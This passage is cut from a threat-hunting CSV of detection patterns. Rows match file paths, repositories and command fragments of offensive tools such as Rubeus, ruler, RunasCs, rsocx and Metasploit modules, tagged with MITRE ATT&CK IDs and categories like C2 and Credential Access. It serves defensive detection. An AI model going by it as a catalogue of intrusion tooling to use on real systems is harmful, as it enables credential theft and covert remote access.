T1134.002 - T1055","TA0004","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RogueWinRM","1","1","N/A","10","7","633","101","2020-02-23T19:26:41Z","2019-12-02T22:58:03Z" "*/RogueWinRMdll*",".{0,1000}\/RogueWinRMdll.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/RogueWinRMexe*",".{0,1000}\/RogueWinRMexe.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/root/.mozilla/firefox/*.Exegol*",".{0,1000}\/root\/\.mozilla\/firefox\/.{0,1000}\.Exegol.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*/root/dns2tcp*",".{0,1000}\/root\/dns2tcp.{0,1000}","offensive_tool_keyword","dns2tcp","Dns2tcp is a tool for relaying TCP connections over DNS","T1071.004 - T1048.003","TA0011 - TA0001","N/A","N/A","C2","https://github.com/alex-sector/dns2tcp","1","0","N/A","10","10","164","51","2023-04-18T16:14:42Z","2017-11-23T11:19:53Z" "*/root/lsarelayx*",".{0,1000}\/root\/lsarelayx.{0,1000}","offensive_tool_keyword","lsarelayx","lsarelayx is system wide NTLM relay tool designed to relay incoming NTLM based authentication to the host it is running on","T1557.001 - T1187 - T1558","TA0001 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/CCob/lsarelayx","1","0","N/A","10","6","511","62","2023-04-25T23:15:33Z","2021-11-12T18:55:01Z" "*/root/output/ratchatPT*",".{0,1000}\/root\/output\/ratchatPT.{0,1000}","offensive_tool_keyword","ratchatpt","C2 using openAI API","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","0","risk of False positive","10","10","6","3","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z" "*/root/shellcode.c*",".{0,1000}\/root\/shellcode\.c.{0,1000}","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/lengjibo/FourEye","1","0","N/A","10","8","739","152","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z" "*/root/shellcode.cpp*",".{0,1000}\/root\/shellcode\.cpp.{0,1000}","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/lengjibo/FourEye","1","0","N/A","10","8","739","152","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z" "*/root/shellcode.exe*",".{0,1000}\/root\/shellcode\.exe.{0,1000}","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/lengjibo/FourEye","1","0","N/A","10","8","739","152","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z" "*/root/viper/*",".{0,1000}\/root\/viper\/.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*/root/viper/dist*",".{0,1000}\/root\/viper\/dist.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","0","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*/rop_emporium*",".{0,1000}\/rop_emporium.{0,1000}","offensive_tool_keyword","Exrop","Exrop is automatic ROP chains generator tool which can build gadget chain automatically from given binary and constraints","T1554","TA0003","N/A","N/A","Exploitation tools","https://github.com/d4em0n/exrop","1","1","N/A","N/A","3","277","27","2020-02-21T08:01:06Z","2020-01-19T05:09:00Z" "*/ropbuffers.go*",".{0,1000}\/ropbuffers\.go.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","N/A","Persistence","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","2082","347","2024-03-18T00:51:32Z","2016-08-18T15:05:13Z" "*/ropfuscator*",".{0,1000}\/ropfuscator.{0,1000}","offensive_tool_keyword","ropfuscator","ROPfuscator is a fine-grained code obfuscation framework for C/C++ programs using ROP (return-oriented programming).","T1090 - T1027 - T1055 - T1099 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/ropfuscator/ropfuscator","1","1","N/A","N/A","4","397","30","2023-08-11T00:41:55Z","2021-11-16T18:13:57Z" "*/rottenpotato*",".{0,1000}\/rottenpotato.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/rpcap-brute.nse*",".{0,1000}\/rpcap\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/rpcap-info.nse*",".{0,1000}\/rpcap\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/rpcbomb.rb*",".{0,1000}\/rpcbomb\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/rpcdump.py*",".{0,1000}\/rpcdump\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","1","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*/rpcdump.py*",".{0,1000}\/rpcdump\.py.{0,1000}","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","1","N/A","10","7","689","109","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z" "*/rpc-grind.nse*",".{0,1000}\/rpc\-grind\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/rpcinfo.nse*",".{0,1000}\/rpcinfo\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/rpcrt.py *",".{0,1000}\/rpcrt\.py\s.{0,1000}","offensive_tool_keyword","POC","Remote Code Execution Exploit in the RPC Library CVE-2022-26809","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/yuanLink/CVE-2022-26809","1","0","N/A","N/A","1","61","27","2022-05-25T00:57:52Z","2022-05-01T13:19:10Z" "*/rpivot.git*",".{0,1000}\/rpivot\.git.{0,1000}","offensive_tool_keyword","rpivot","socks4 reverse proxy for penetration testing","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/klsecservices/rpivot","1","1","N/A","10","10","533","123","2018-07-12T09:53:13Z","2016-09-07T17:25:57Z" "*/rsa-vuln-roca.nse*",".{0,1000}\/rsa\-vuln\-roca\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/rservices_from_users.txt*",".{0,1000}\/rservices_from_users\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/rsockstun *",".{0,1000}\/rsockstun\s.{0,1000}","offensive_tool_keyword","rsockstun","reverse socks tunneler with ntlm and proxy support","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","N/A","C2","https://github.com/llkat/rsockstun","1","0","N/A","10","10","43","19","2022-08-09T09:25:50Z","2018-10-17T09:51:11Z" "*/rsockstun.git*",".{0,1000}\/rsockstun\.git.{0,1000}","offensive_tool_keyword","rsockstun","reverse socks tunneler with ntlm and proxy support","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","N/A","C2","https://github.com/llkat/rsockstun","1","1","N/A","10","10","43","19","2022-08-09T09:25:50Z","2018-10-17T09:51:11Z" "*/rsocx-*-linux-x86-64.zip*",".{0,1000}\/rsocx\-.{0,1000}\-linux\-x86\-64\.zip.{0,1000}","offensive_tool_keyword","rsocx","A bind/reverse Socks5 proxy server.","T1090.001 - T1090.002 - T1071.001","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/b23r0/rsocx","1","1","N/A","10","10","354","139","2022-09-28T08:11:34Z","2015-05-13T04:02:55Z" "*/rsocx-*-windows-x86-64.zip*",".{0,1000}\/rsocx\-.{0,1000}\-windows\-x86\-64\.zip.{0,1000}","offensive_tool_keyword","rsocx","A bind/reverse Socks5 proxy server.","T1090.001 - T1090.002 - T1071.001","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/b23r0/rsocx","1","1","N/A","10","10","354","139","2022-09-28T08:11:34Z","2015-05-13T04:02:55Z" "*/rsocx.exe*",".{0,1000}\/rsocx\.exe.{0,1000}","offensive_tool_keyword","rsocx","A bind/reverse Socks5 proxy server.","T1090.001 - T1090.002 - T1071.001","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/b23r0/rsocx","1","1","N/A","10","10","354","139","2022-09-28T08:11:34Z","2015-05-13T04:02:55Z" "*/rsocx.git*",".{0,1000}\/rsocx\.git.{0,1000}","offensive_tool_keyword","rsocx","A bind/reverse Socks5 proxy server.","T1090.001 - T1090.002 - T1071.001","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/b23r0/rsocx","1","1","N/A","10","10","354","139","2022-09-28T08:11:34Z","2015-05-13T04:02:55Z" "*/rsync-brute.nse*",".{0,1000}\/rsync\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/rsync-list-files.py*",".{0,1000}\/rsync\-list\-files\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","1","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*/rsync-list-modules.nse*",".{0,1000}\/rsync\-list\-modules\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/rt_hijacking.exe*",".{0,1000}\/rt_hijacking\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*/rtsp-methods.nse*",".{0,1000}\/rtsp\-methods\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/rtsp-url-brute.nse*",".{0,1000}\/rtsp\-url\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/Rubeus*",".{0,1000}\/Rubeus.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/GhostPack/Rubeus","1","1","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "*/Rubeus.exe*",".{0,1000}\/Rubeus\.exe.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","8","2","2024-04-29T01:58:07Z","2021-12-10T15:04:35Z" "*/Rubeus.exe*",".{0,1000}\/Rubeus\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/Rubeus.git*",".{0,1000}\/Rubeus\.git.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "*/Rubeus/*",".{0,1000}\/Rubeus\/.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "*/Rudrastra.git*",".{0,1000}\/Rudrastra\.git.{0,1000}","offensive_tool_keyword","Rudrastra","Make a Fake wireless access point aka Evil Twin","T1491 - T1090.004 - T1557.001","TA0040 - TA0011 - TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/SxNade/Rudrastra","1","1","N/A","8","1","61","20","2023-04-22T15:10:42Z","2020-11-05T09:38:15Z" "*/ruler --domain *",".{0,1000}\/ruler\s\-\-domain\s.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","N/A","Persistence","https://github.com/sensepost/ruler","1","0","N/A","N/A","10","2082","347","2024-03-18T00:51:32Z","2016-08-18T15:05:13Z" "*/ruler --email *",".{0,1000}\/ruler\s\-\-email\s.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","N/A","Persistence","https://github.com/sensepost/ruler","1","0","N/A","N/A","10","2082","347","2024-03-18T00:51:32Z","2016-08-18T15:05:13Z" "*/ruler -k -d * dump -o *",".{0,1000}\/ruler\s\-k\s\-d\s.{0,1000}\sdump\s\-o\s.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*/ruler --url*",".{0,1000}\/ruler\s\-\-url.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","N/A","Persistence","https://github.com/sensepost/ruler","1","0","N/A","N/A","10","2082","347","2024-03-18T00:51:32Z","2016-08-18T15:05:13Z" "*/rulerforms.go*",".{0,1000}\/rulerforms\.go.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","N/A","Persistence","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","2082","347","2024-03-18T00:51:32Z","2016-08-18T15:05:13Z" "*/run/leet.pl*",".{0,1000}\/run\/leet\.pl.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*/run/tor/socks*",".{0,1000}\/run\/tor\/socks.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","CostaRicto - Operation Wocao","APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*/run/tor/tor.pid*",".{0,1000}\/run\/tor\/tor\.pid.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","CostaRicto - Operation Wocao","APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*/run_as_psh.*",".{0,1000}\/run_as_psh\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/RunasCs.cs*",".{0,1000}\/RunasCs\.cs.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs/","1","0","N/A","6","9","872","117","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" "*/RunasCs.git*",".{0,1000}\/RunasCs\.git.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credential","T1055 - T1134.001","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","1","N/A","N/A","9","872","117","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" "*/RunasCs.git*",".{0,1000}\/RunasCs\.git.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs/","1","1","N/A","6","9","872","117","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" "*/RunasCs.zip*",".{0,1000}\/RunasCs\.zip.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credential","T1055 - T1134.001","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","1","N/A","N/A","9","872","117","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" "*/runasppl.py*",".{0,1000}\/runasppl\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/RunAsWinTcb.git*",".{0,1000}\/RunAsWinTcb\.git.{0,1000}","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","1","N/A","10","2","126","16","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z" "*/RunAsWinTcb.iml*",".{0,1000}\/RunAsWinTcb\.iml.{0,1000}","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","1","N/A","10","2","126","16","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z" "*/runcalc.dll*",".{0,1000}\/runcalc\.dll.{0,1000}","offensive_tool_keyword","metasploit","Metasploit 